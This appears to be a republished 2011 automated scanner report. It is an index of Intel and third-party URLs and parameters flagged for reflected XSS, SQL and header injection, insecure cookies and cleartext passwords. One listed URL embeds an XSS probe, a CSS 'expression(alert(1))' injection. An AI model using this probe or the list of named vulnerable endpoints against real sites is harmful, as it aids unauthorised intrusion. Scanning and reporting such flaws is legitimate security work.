Intel Web System Example, Cross Site Scripting, XSS, CWE-79, CAPEC-86

XSS in INTC HTTP Systems | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 08:56:57 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://6418dc.r.axf8.net/mr/a.gif [a parameter]

1.2. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 1]

1.3. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 3]

1.4. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 6]

2. XPath injection

3. HTTP header injection

3.1. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

3.2. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

3.3. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

3.4. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

3.5. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

3.6. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

3.7. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

3.8. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

3.9. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://digg.com/submit [REST URL parameter 1]

4.2. http://inside.intel.com/LOPFeedMashup [SN parameter]

4.3. http://inside.intel.com/LOPSPFeedMashup [SN1 parameter]

4.4. http://inside.intel.com/LOPSPFeedMashup [SN2 parameter]

4.5. http://inside.intel.com/LOPSPFeedMashup [SN3 parameter]

4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.8. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.9. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.10. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.11. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.12. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

4.13. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.14. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.15. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.16. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml [Referer HTTP header]

4.17. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 10]

4.18. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

4.19. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 3]

4.20. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 4]

4.21. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 5]

4.22. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 6]

4.23. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 7]

4.24. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 8]

4.25. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 9]

4.26. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 10]

4.27. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

4.28. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 3]

4.29. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 4]

4.30. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 5]

4.31. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 6]

4.32. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 7]

4.33. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 8]

4.34. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 9]

4.35. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 10]

4.36. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

4.37. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 3]

4.38. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 4]

4.39. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 5]

4.40. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 6]

4.41. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 7]

4.42. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 8]

4.43. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 9]

4.44. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 10]

4.45. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

4.46. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 3]

4.47. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 4]

4.48. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 5]

4.49. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 6]

4.50. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 7]

4.51. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 8]

4.52. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 9]

4.53. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 10]

4.54. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

4.55. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 3]

4.56. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 4]

4.57. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 5]

4.58. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 6]

4.59. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 7]

4.60. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 8]

4.61. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 9]

4.62. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 10]

4.63. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

4.64. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 3]

4.65. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 4]

4.66. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 5]

4.67. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 6]

4.68. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 7]

4.69. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 8]

4.70. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 9]

4.71. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 10]

4.72. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

4.73. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 3]

4.74. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 4]

4.75. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 5]

4.76. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 6]

4.77. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 7]

4.78. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 8]

4.79. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 9]

4.80. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 10]

4.81. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

4.82. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 3]

4.83. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 4]

4.84. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 5]

4.85. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 6]

4.86. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 7]

4.87. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 8]

4.88. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 9]

4.89. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 10]

4.90. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4.91. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 3]

4.92. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 4]

4.93. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 5]

4.94. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 6]

4.95. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 7]

4.96. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 8]

4.97. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 9]

4.98. http://www.intel.com/pressroom/index.htm [iid parameter]

4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://i.ytimg.com/crossdomain.xml

5.2. http://gdata.youtube.com/crossdomain.xml

5.3. http://www.facebook.com/crossdomain.xml

5.4. http://www.intel.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.ericmmartin.com/projects/simplemodal/

6.3. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

6.4. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

7. SQL statement in request parameter

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

9.2. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

9.3. http://www.intel.com/references/index.htm

10. Password field submitted using GET method

11. Cookie scoped to parent domain

11.1. http://communities.intel.com/community/openportit/server

11.2. http://communities.intel.com/community/openportit/vproexpert

11.3. http://communities.intel.com/community/tech

11.4. http://communities.intel.com/community/tech/desktop

11.5. http://communities.intel.com/index.jspa

11.6. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

11.7. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

11.8. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

11.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

11.10. http://newsroom.intel.com/4.0.6/styles/jive-community.css

11.11. http://newsroom.intel.com/4.0.6/styles/jive-global.css

11.12. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

11.13. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

11.14. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

11.15. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

11.16. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

11.17. http://newsroom.intel.com/community/intel_newsroom/

11.18. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

11.19. http://newsroom.intel.com/render-widget!execute.jspa

11.20. http://newsroom.intel.com/theme/white/styles/theme.css

11.21. https://secure-newsroom.intel.com/cs_login

11.22. http://software.intel.com/en-us/

11.23. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

11.24. http://software.intel.com/en-us/blogs/

11.25. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

11.26. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

11.27. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

11.28. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

11.29. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

11.30. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

11.31. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

11.32. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

11.33. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

11.34. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

11.35. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

11.36. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

11.37. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

11.38. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

11.39. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

11.40. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

11.41. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

11.42. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

11.43. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

11.44. http://software.intel.com/sites/academic_showcase/

11.45. http://www.opensource.org/licenses/mit-license.php

11.46. http://www.sigcse.org/

11.47. http://code.google.com/p/simplemodal/

11.48. http://code.google.com/p/swfobject/

11.49. http://m.youtube.com/details

11.50. http://www.facebook.com/Intel

11.51. http://www.facebook.com/sharer.php

11.52. http://www.flickr.com/apps/slideshow/show.swf

11.53. http://www.flickr.com/photos/intelphotos

11.54. http://www.youtube.com/channelintel

11.55. http://www.youtube.com/view_play_list

11.56. http://www.youtube.com/watch

11.57. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

12. Cookie without HttpOnly flag set

12.1. http://appdeveloper.intel.com/

12.2. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

12.3. http://communities.intel.com/community/openportit/server

12.4. http://communities.intel.com/community/openportit/vproexpert

12.5. http://communities.intel.com/community/tech

12.6. http://communities.intel.com/community/tech/desktop

12.7. http://communities.intel.com/index.jspa

12.8. http://flesler.demos.com/jquery/scrollTo/

12.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

12.10. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

12.11. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

12.12. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

12.13. http://newsroom.intel.com/4.0.6/styles/jive-community.css

12.14. http://newsroom.intel.com/4.0.6/styles/jive-global.css

12.15. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

12.16. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

12.17. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

12.18. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

12.19. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

12.20. http://newsroom.intel.com/community/intel_newsroom/

12.21. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

12.22. http://newsroom.intel.com/render-widget!execute.jspa

12.23. http://newsroom.intel.com/theme/white/styles/theme.css

12.24. http://onsite2.researchintel.com/engine/icorescript.asp

12.25. http://plugins.jquery.com/project/SimpleModal

12.26. https://secure-newsroom.intel.com/cs_login

12.27. http://software.intel.com/en-us/

12.28. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

12.29. http://software.intel.com/en-us/blogs/

12.30. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

12.31. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

12.32. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

12.33. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

12.34. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

12.35. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

12.36. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

12.37. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

12.38. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

12.39. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

12.40. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

12.41. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

12.42. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

12.43. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

12.44. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

12.45. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

12.46. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

12.47. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

12.48. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

12.49. http://software.intel.com/sites/academic_showcase/

12.50. http://twitter.com/EricMMartin

12.51. http://twitter.com/intel

12.52. http://twitter.com/intelnews

12.53. http://twitter.com/share

12.54. http://www.intc.com/

12.55. http://www.intc.com/alerts.cfm

12.56. http://www.intc.com/analystCenter.cfm

12.57. http://www.intc.com/annuals.cfm

